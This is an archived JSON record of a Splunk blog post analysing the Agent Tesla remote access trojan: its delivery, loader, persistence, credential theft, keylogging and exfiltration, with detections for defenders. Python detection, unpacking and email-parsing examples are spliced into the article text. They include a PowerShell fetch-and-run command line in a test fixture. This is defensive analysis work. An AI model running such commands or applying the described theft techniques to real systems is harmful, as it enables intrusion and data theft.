{
	"id": "eab8222d-003a-44d4-9803-2de3afd70bf7",
	"created_at": "2026-04-06T00:19:06.298268Z",
	"updated_at": "2026-04-10T03:21:04.048507Z",
	"deleted_at": null,
	"sha1_hash": "bcae3dd680236d160a2989761563bb24cfa61c05",
	"title": "Inside the Mind of a ‘Rat’ - Agent Tesla Detection and Analysis | Splunk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6679365,
	"plain_text": "Inside the Mind of a ‘Rat’ - Agent Tesla Detection and Analysis |\r\nSplunk\r\nBy Splunk Threat Research Team\r\nPublished: 2022-11-16 · Archived: 2026-04-05 15:53:44 UTC\r\nAgent Tesla is a remote access trojan (RAT) written for the .NET framework that has knowingly been in operation\r\nsince 2014. Threat actors behind this malware have leveraged many different methods to deliver their payload\r\nover time including macro enabled Word documents, Microsoft Office vulnerabilities, OLE objects and most\r\nrecently, compiled HTML help files. Agent Tesla has been in the top 10 most submitted samples in known open\r\nmalware source repositories in cyber security communities like Malware Bazaar and Any.run. It is a full-featured\r\nRAT with multiple ways to exfiltrate organization data through keylogging, screen captures, credential stealing\r\nand much more.\r\nIn this blog post, the Splunk Threat Research Team (STRT) describes the different tactics, techniques and\r\nprocedures mapped to the ATT\u0026CK framework leveraged by this remote access trojan. Additionally, we will\r\nhighlight the detection analytics we released that can help cyber defenders in identifying signs of compromise.\r\nAnalysis\r\nIdentification of Samples\r\nFor this analysis, the STRT started the journey with a sample uploaded by JAMESWT_MHT on August 31st to\r\nMalware Bazaar. This sample led us to the “ftp-boloni-ma” tag that compiles several samples of a campaign\r\nleveraging the Agent Tesla malware. 
Specifically, this campaign used a malicious compiled HTML (.CHM) file as\r\na delivery method to drop and execute its first and second stages and load the remote access trojan.\r\nThe high-level flow of process execution for this sample is shown in Figure 1.\r\nFigure 1.1 shows the list of hashes that have this tag.\r\nhttps://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html\r\nPage 1 of 15\n\nFor security teams that would like to see how the execution of compiled HTML files looks against their\r\nprevention or detection controls, we recommend having a look at the AtomicTestHarness for CHM and the Atomic\r\nRed Team technique T1218.001 built by the Red Canary team.\r\nT1566.001 - Spear Phishing Attachment\r\nThis Agent Tesla variant uses a compiled HTML file (.chm) to conceal its malicious code and gain an initial\r\nfoothold on the victim endpoint. The file has an embedded and obfuscated JavaScript script that invokes\r\nPowerShell to download a second stage.\r\nFigure 1.1 shows the .chm file loading upon execution.\r\nFigure 1.2 shows the obfuscated and deobfuscated versions of the embedded JavaScript code. Once executed, it\r\nwill invoke PowerShell.exe to download extra content from the Internet using the System.Net WebClient class and\r\nthe DownloadString method.\r\nThe Loader\r\nT1059.001 - Command and Scripting Interpreter: PowerShell\r\nThe downloaded file, disguised as a text .txt file, is in reality a PowerShell script shown in Figure 2. This\r\nobfuscated second stage script is the one responsible for loading the actual Agent Tesla malware in memory.\r\nThe variable named $TzbW contains a string that, when deobfuscated, implements the tMCfkSD function also\r\nshown in Figure 2. 
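Before following the loader further, here is an added example of the detection logic the CHM-to-PowerShell stage above suggests. It is not Splunk’s detection content and not code from the original post: it flags hh.exe spawning powershell.exe with a download primitive on its command line, and also decodes -EncodedCommand arguments so base64 obfuscation does not hide the WebClient call. The process events are constructed to resemble Sysmon process-creation fields; the field names, the hosts and the URL are assumptions.

```python
# Added example (not Splunk detection content, not code from the original
# post): flag a compiled HTML help host (hh.exe) spawning PowerShell with a
# download primitive, the T1218.001 -> T1059.001 chain the CHM stage uses.
# The events below are constructed to resemble Sysmon Event ID 1 fields and
# are not telemetry from the original analysis.
import base64
import ntpath

CHM_HOST = 'hh.exe'
POWERSHELL_IMAGES = ('powershell.exe', 'pwsh.exe')
# Download primitives a stager typically needs; matched case-insensitively.
DOWNLOAD_PRIMITIVES = (
    'downloadstring', 'downloadfile', 'downloaddata',
    'net.webclient', 'invoke-webrequest', 'invoke-restmethod',
)
ENCODED_SWITCHES = ('e', 'ec', 'enc', 'encodedcommand')


def decode_encoded_command(cmd):
    # PowerShell -EncodedCommand carries base64 of UTF-16LE text. Return the
    # decoded text, or an empty string when no such switch is present or the
    # argument does not decode.
    tokens = cmd.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower().lstrip('-/') in ENCODED_SWITCHES:
            try:
                return base64.b64decode(tokens[i + 1]).decode('utf-16-le', 'ignore')
            except ValueError:
                return ''
    return ''


def is_chm_powershell_download(event):
    # True when hh.exe launched PowerShell and either the literal command line
    # or its decoded -EncodedCommand payload contains a download primitive.
    parent = ntpath.basename(event.get('parent_image', '')).lower()
    image = ntpath.basename(event.get('image', '')).lower()
    if parent != CHM_HOST or image not in POWERSHELL_IMAGES:
        return False
    cmd = event.get('command_line', '')
    text = (cmd + ' ' + decode_encoded_command(cmd)).lower()
    return any(p in text for p in DOWNLOAD_PRIMITIVES)


def scan(events):
    # Process GUIDs of matching events, in input order, ready for a notable.
    return [e['process_guid'] for e in events if is_chm_powershell_download(e)]


BS = chr(92)  # backslash, the Windows path separator
PS_IMAGE = BS.join(['C:', 'Windows', 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe'])
HH_IMAGE = BS.join(['C:', 'Windows', 'hh.exe'])
# Constructed stage-2 fetch, base64/UTF-16LE encoded the way -enc expects it.
ENCODED_FETCH = base64.b64encode(
    '(New-Object Net.WebClient).DownloadString(http://example.invalid/stage2.txt)'.encode('utf-16-le')
).decode('ascii')

SAMPLE_EVENTS = [
    # A: the chain from the post, plaintext download primitive
    {'process_guid': 'A', 'parent_image': HH_IMAGE, 'image': PS_IMAGE,
     'command_line': 'powershell -w hidden -c IEX((New-Object System.Net.WebClient).DownloadString(http://example.invalid/stage2.txt))'},
    # B: hh.exe opening a benign child, not PowerShell
    {'process_guid': 'B', 'parent_image': HH_IMAGE, 'image': BS.join(['C:', 'Windows', 'System32', 'notepad.exe']),
     'command_line': 'notepad.exe readme.txt'},
    # C: the same download from Explorer, outside the CHM chain
    {'process_guid': 'C', 'parent_image': BS.join(['C:', 'Windows', 'explorer.exe']), 'image': PS_IMAGE,
     'command_line': 'powershell -c (New-Object System.Net.WebClient).DownloadString(http://example.invalid/x)'},
    # D: the chain again, but hidden behind -enc
    {'process_guid': 'D', 'parent_image': HH_IMAGE, 'image': PS_IMAGE,
     'command_line': 'powershell -w hidden -enc ' + ENCODED_FETCH},
]

if __name__ == '__main__':
    print(scan(SAMPLE_EVENTS))
```

Event C is deliberately left unmatched: the parent-process condition is what keeps this rule specific to the CHM delivery, and a broader PowerShell-download rule belongs in a separate, lower-confidence analytic.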
The tMCfkSD function will in turn deobfuscate and decompress the array of bytes stored in the variable\r\nnamed $zmOo. This deobfuscated and decompressed version is the actual .NET assembly of the Agent Tesla malware,\r\nwhich is executed in memory using PowerShell reflection.\r\nFigure 2 shows the main parts of this second stage component and the gzip decompression function.\r\nFigure 2.1 shows a screenshot of a simple Python script we wrote to deobfuscate the PowerShell function Agent\r\nTesla’s second stage uses to decompress and deobfuscate the binary stored in the $zmOo byte array variable. The\r\nPython script can be found on GitHub as agent_function_loader_deobfus.py.\r\nThis loader deobfuscates the Agent Tesla malware and loads it from a memory stream using .NET Reflection. This\r\npart of its execution can be considered fileless, since the Agent Tesla binary is never dropped on\r\ndisk but is executed directly from memory.\r\nFigure 2.2 shows the Python script we wrote to extract the actual Agent Tesla malware binary. This Python script\r\nwill drop the Agent Tesla malware as agent_unpack.bin in the current working directory. The script can be found\r\non GitHub as agent_function_loader_deobfus2.py.\r\nAgent Tesla Analysis\r\nPacker/ Obfuscator\r\nThe Agent Tesla sample extracted in the second stage component is a .NET compiled binary obfuscated with the\r\nopen source Obfuscar .NET obfuscator. Using the DIE (Detect It Easy) tool we can identify the obfuscation method and the\r\ncompilation type of this file, as shown in Figure 3. 
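The extraction step that Figures 2.1 and 2.2 describe, as an added Python example rather than the STRT’s own scripts: it pulls the decimal byte array assigned to $zmOo out of the loader text, gzip-decompresses it, and checks that the result has a plausible MZ/PE header before it is handed to a .NET decompiler. The loader text is constructed here and the payload is an MZ/PE-shaped stub, not a real Agent Tesla sample; the variable name $zmOo and the function name tMCfkSD are taken from the post, everything else is an assumption.

```python
# Added example (not the STRT's agent_function_loader_deobfus scripts): pull
# the gzip-compressed assembly out of a PowerShell loader that embeds it as a
# decimal byte array, decompress it and sanity-check the header.
import gzip
import struct

# Characters that may appear inside a PowerShell array literal without
# ending it: whitespace and parentheses (the [byte[]] cast is stripped first).
WS = ' ()' + chr(9) + chr(10) + chr(13)
GZIP_MAGIC = bytes([0x1F, 0x8B])


def extract_byte_array(script, var_name):
    # Find the first assignment to var_name and collect the decimal literals
    # that follow it until something other than a digit, comma or whitespace
    # appears (a ';' or the next statement).
    idx = script.find(var_name)
    if idx < 0:
        raise ValueError('variable not found: ' + var_name)
    eq = script.find('=', idx)
    if eq < 0:
        raise ValueError('no assignment to ' + var_name)
    tail = script[eq + 1:].replace('[byte[]]', '')
    values = []
    token = ''
    for ch in tail:
        if ch.isdigit():
            token += ch
        elif ch == ',':
            if token:
                values.append(int(token))
            token = ''
        elif ch in WS:
            continue
        else:
            break
    if token:
        values.append(int(token))
    if not values or max(values) > 255:
        raise ValueError('not a byte array')
    return bytes(values)


def unpack_loader(script, var_name='$zmOo'):
    # Recover the decompressed payload. A non-gzip prefix means the loader
    # applies another layer (XOR, base64, reversed bytes) that has to be
    # undone first; fail loudly instead of returning garbage.
    blob = extract_byte_array(script, var_name)
    if blob[:2] != GZIP_MAGIC:
        raise ValueError('array does not start with the gzip magic; another decoding layer is present')
    return gzip.decompress(blob)


def looks_like_pe(payload):
    # Minimal check: an MZ stub whose e_lfanew points at a PE signature.
    if len(payload) < 0x40 or payload[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', payload, 0x3C)[0]
    return payload[e_lfanew:e_lfanew + 4] == b'PE' + bytes(2)


def build_sample_loader():
    # Constructed loader text: an MZ/PE-shaped stub (not a real assembly),
    # gzipped and written the way the second stage embeds its payload.
    stub = bytearray(0x44)
    stub[0:2] = b'MZ'
    struct.pack_into('<I', stub, 0x3C, 0x40)
    stub[0x40:0x44] = b'PE' + bytes(2)
    array = ','.join(str(b) for b in gzip.compress(bytes(stub)))
    lines = [
        '[byte[]] $zmOo = ' + array + ';',
        '$asm = tMCfkSD($zmOo)',  # the decompress-and-reflect step
    ]
    return chr(10).join(lines)


if __name__ == '__main__':
    payload = unpack_loader(build_sample_loader())
    print(len(payload), looks_like_pe(payload))
```

On a real sample the byte array is several hundred kilobytes and the unpacked file should then be opened in a .NET decompiler; the gzip-magic check is the place to notice when a variant adds an XOR or base64 layer in front of the compression.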
Adversaries pack or obfuscate their payloads in the hope of evading\r\ncritical controls like mail gateways, sandboxes and anti-virus software.\r\nDiscovery - TA0007\r\nT1033 - System Owner/User Discovery\r\nOn every check-in to the command and control server (via the FTP, HTTP or SMTP protocols), this Agent Tesla\r\nsample collects and submits the user name, computer name, operating system version and total physical memory\r\nof the compromised endpoint.\r\nFigure 4\r\nExecution - TA0002\r\nT1204.002 - Malicious File\r\nThis particular Agent Tesla sample includes the ability to download a remote file from one of its C2 servers and\r\nsave it to the hardcoded path “%temp%\\LUU”. The final step of the function also executes the downloaded\r\nfile. Unfortunately the URL was inaccessible as of writing.\r\nFigure 4 shows the code snippet of how it captures the system information of the compromised machine as part of\r\nits C2 communication.\r\nPersistence - TA0003\r\nT1547.001 - Registry Run / Startup Folder\r\nIf enabled, Agent Tesla has two built-in persistence mechanisms that allow it to load itself upon boot. 
It is either by\r\ndropping a copy of itself in the Startup folder or by adding registry Run keys.\r\nFigures 5.1 and 5.2 show short code snippets of how it creates Registry Run keys and a possible entry in the\r\nStartup folder for its persistence (T1547.001).\r\nFigure 5.1\r\nFigure 5.2\r\nCredential Access - TA0006\r\nAgent Tesla implements several techniques to collect sensitive information on the compromised endpoint.\r\nT1555.003 - Credentials from Web Browsers\r\nThe first technique is parsing credentials or sensitive browser data. Agent Tesla includes a list of targeted browsers\r\nfrom which it parses login credentials, browser cookies and browser profiles, and grabs browser .sqlite database files. Figure 6\r\nshows a short code snippet of the function, renamed “mw_parsing_browser_db”, that contains the list of\r\nbrowsers for which Agent Tesla attempts to parse or copy the “cookies.sqlite” database file.\r\nBelow is the complete table of targeted browsers.\r\nT1555.005 - Password Managers\r\nAside from stealing browser secrets, it also attempts to steal passwords from commonly used applications like\r\nOpenVPN, FileZilla and Mailbird. It accomplishes this by reading registry entries, decrypting/decoding or parsing\r\nlocal databases, or by reading configuration files. The table below lists the targeted applications that are\r\nrelated to this data collection.\r\nT1056.001 - Keylogging\r\nThis Agent Tesla sample is also capable of installing a keylogger on the compromised host. 
It uses the\r\nSetWindowsHookEx Windows API to install a hook procedure that monitors low-level keyboard input events.\r\nFigure 7 shows the code snippet where it sets up the Windows hook procedure for keyboard events.\r\nFigure 7\r\nCommand And Control - TA0011\r\nT1090.003 - TOR Proxy\r\nAgent Tesla also uses a Tor proxy for its HTTP requests. It tries to download a Tor application from a specific Tor\r\nwebsite. Figure 8 shows the function that downloads the Tor browser, which is saved as a “tor.zip” file in\r\nthe %appdata% folder.\r\nFigure 8\r\nCollection - TA0009\r\nT1113 - Screen Capture\r\nFigure 9 shows the code snippet of how Agent Tesla captures a screenshot of the compromised\r\nmachine’s desktop; the image is kept in a memory stream and later sent to its C2 server.\r\nFigure 9\r\nExfiltration - TA0010\r\nT1041 - Exfiltration Over C2 Channel\r\nDuring analysis of this Agent Tesla sample it was identified to have three ways to exfiltrate stolen sensitive\r\ninformation from the compromised host. The exfiltrated data may be sent to an FTP, SMTP or HTTP command\r\nand control server. Figure 10 shows the code snippet of how the agent sets up each method to exfiltrate data.\r\nThe remote C2 server was down during the analysis of this sample. STRT experimented with its SMTP\r\ncommunication to see what the exfiltrated data looks like on the attacker side. 
We used a fake SMTP\r\nserver by rnwood (smtp4dev) to receive all the exfiltrated data from this sample.\r\nAttacker Perspective\r\nData Exfiltration\r\nFigure 11 shows the email sent by Agent Tesla to the fake SMTP server containing a .zip file attachment with\r\nthe filename format “CO_\u003cusername\u003e/\u003cComputerName\u003e\u003cDateTime\u003e.zip”.\r\nThis .zip file contains the collected browser data, which in our case is the cookies.sqlite file.\r\nIn addition, it includes the basic system information: UserName, ComputerName, OSFullName, CPU\r\nand RAM.\r\nFigure 11\r\nFigure 12 shows the email sent by the Agent Tesla malware containing the desktop screenshots of the compromised\r\nmachine. The email body has the same format and contains the same system information, except that the\r\ndesktop screenshot .jpeg file is named “SC_\u003cusername\u003e/\u003cComputerName\u003e\u003cDateTime\u003e.jpeg”.\r\nFigure 12\r\nLastly, Figures 13.1 (notepad++) and 13.2 (firefox) show the emails sent by this sample during our testing related to\r\nits keylogging feature. 
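The three exfiltration email formats described above (CO_, SC_ and KL_ subjects and attachment names), as an added example of the parsing a mail gateway or an smtp4dev capture could apply; it is not code from the original post. It builds two constructed Agent Tesla-style messages and one benign one, then classifies each by subject prefix and pulls out the username, the ComputerName/DateTime fragment, the attachment names and the system-information fields from the body. The body layout (Key: value lines) and the address fields are assumptions, since the post only names the fields.

```python
# Added example (not from the original post): classify captured SMTP messages
# by the subject/attachment naming Agent Tesla uses for its three exfil
# types. The messages are constructed; the body layout is an assumption.
import email
import email.policy
from email.message import EmailMessage

EXFIL_KINDS = {
    'CO': 'credentials and browser data',
    'SC': 'screen capture',
    'KL': 'keylog',
}
SYSINFO_FIELDS = ('UserName', 'ComputerName', 'OSFullName', 'CPU', 'RAM')


def classify_exfil(raw):
    # Returns None for mail that does not follow the naming scheme, else a
    # dict with the exfil kind, the victim username, the ComputerName plus
    # DateTime fragment after the slash, attachment names and any
    # system-information lines recognised in the text body.
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    subject = str(msg['subject'] or '')
    prefix, sep, rest = subject.partition('_')
    if not sep or prefix not in EXFIL_KINDS:
        return None
    user, _, host_and_time = rest.partition('/')
    body_part = msg.get_body(preferencelist=('plain',))
    body = body_part.get_content() if body_part is not None else ''
    sysinfo = {}
    for line in body.splitlines():
        key, colon, value = line.partition(':')
        if colon and key.strip() in SYSINFO_FIELDS:
            sysinfo[key.strip()] = value.strip()
    return {
        'kind': EXFIL_KINDS[prefix],
        'user': user,
        'host_and_time': host_and_time,
        'attachments': [p.get_filename() for p in msg.iter_attachments()],
        'sysinfo': sysinfo,
    }


def build_message(subject, body, attachment_name=None, attachment_bytes=b''):
    # Constructed message in the shape observed in the smtp4dev capture;
    # sender and recipient are placeholders.
    msg = EmailMessage()
    msg['From'] = 'victim@example.invalid'
    msg['To'] = 'dropbox@example.invalid'
    msg['Subject'] = subject
    msg.set_content(body)
    if attachment_name:
        msg.add_attachment(attachment_bytes, maintype='application',
                           subtype='octet-stream', filename=attachment_name)
    return msg.as_bytes()


LF = chr(10)
SYSINFO_BODY = LF.join([
    'UserName: alice', 'ComputerName: WKS01',
    'OSFullName: Microsoft Windows 10 Pro', 'CPU: example cpu', 'RAM: 16384 MB',
])
SAMPLE_CO = build_message('CO_alice/WKS01 2022-11-16 10:20:30', SYSINFO_BODY,
                          'CO_alice/WKS01 2022-11-16 10:20:30.zip', b'PK')
SAMPLE_KL = build_message('KL_alice/WKS01', 'notepad++ : hello' + LF + SYSINFO_BODY)
SAMPLE_BENIGN = build_message('Invoice 42', 'Please find attached.')

if __name__ == '__main__':
    for raw in (SAMPLE_CO, SAMPLE_KL, SAMPLE_BENIGN):
        print(classify_exfil(raw))
```

Matching on the subject prefix alone is cheap and works on whatever the mail server logs; a gateway rule should additionally require the slash-separated user/host pair, since a plain CO_ or KL_ prefix on its own is too short to be a reliable indicator.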
This malware checks whether the keylog file log.tmp exists in %temp%; if it does not, it sends the captured\r\nkeystrokes directly to its C2, in this case via SMTP.\r\nBelow are a few of the keys typed by the user and the process associated with each keystroke.\r\nFigure 13.1\r\nFigure 13.2\r\nFor this type of exfiltration the subject of the email has the format “KL_\u003cusername\u003e/\u003cComputerName\u003e”.\r\nDetections\r\nBelow is the table of detections that the STRT developed to identify possible Agent Tesla behavior and\r\nmalicious .chm behavior.\r\nAutomate with SOAR Playbooks\r\nAll of the previously listed detections create entries in the risk index by default, and can be used seamlessly with\r\nrisk notables and the Risk Notable Playbook Pack. The community Splunk SOAR playbooks below can also be\r\nused in conjunction with some of the previously described analytics:\r\nWhy Should You Care?\r\nWith this article the Splunk Threat Research Team (STRT) enables security analysts, blue teamers and Splunk\r\ncustomers to identify the Agent Tesla tactics, techniques and procedures. By understanding its behaviors, we were\r\nable to generate telemetry and datasets to develop and test Splunk detections designed to defend and respond\r\nagainst this type of threat.\r\nLearn More\r\nYou can find the latest content about security analytic stories on GitHub and in Splunkbase. Splunk Security\r\nEssentials also has all these detections now available via push update.\r\nFor a full list of security content, check out the release notes on Splunk Docs.\r\nFeedback\r\nAny feedback or requests? Feel free to open an issue on GitHub and we’ll follow up. 
Alternatively, join us on the\r\nSlack channel #security-research. Follow these instructions if you need an invitation to our Splunk user groups on\r\nSlack.\r\nContributors\r\nWe would like to thank Teoderick Contreras, Michael Haag, Mauricio Velazco and Lou Stella for their\r\ncontributions to this post.\r\nSource: https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html"
	],
	"report_names": [
		"inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775791264,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bcae3dd680236d160a2989761563bb24cfa61c05.pdf",
		"text": "https://archive.orkl.eu/bcae3dd680236d160a2989761563bb24cfa61c05.txt",
		"img": "https://archive.orkl.eu/bcae3dd680236d160a2989761563bb24cfa61c05.jpg"
	}
}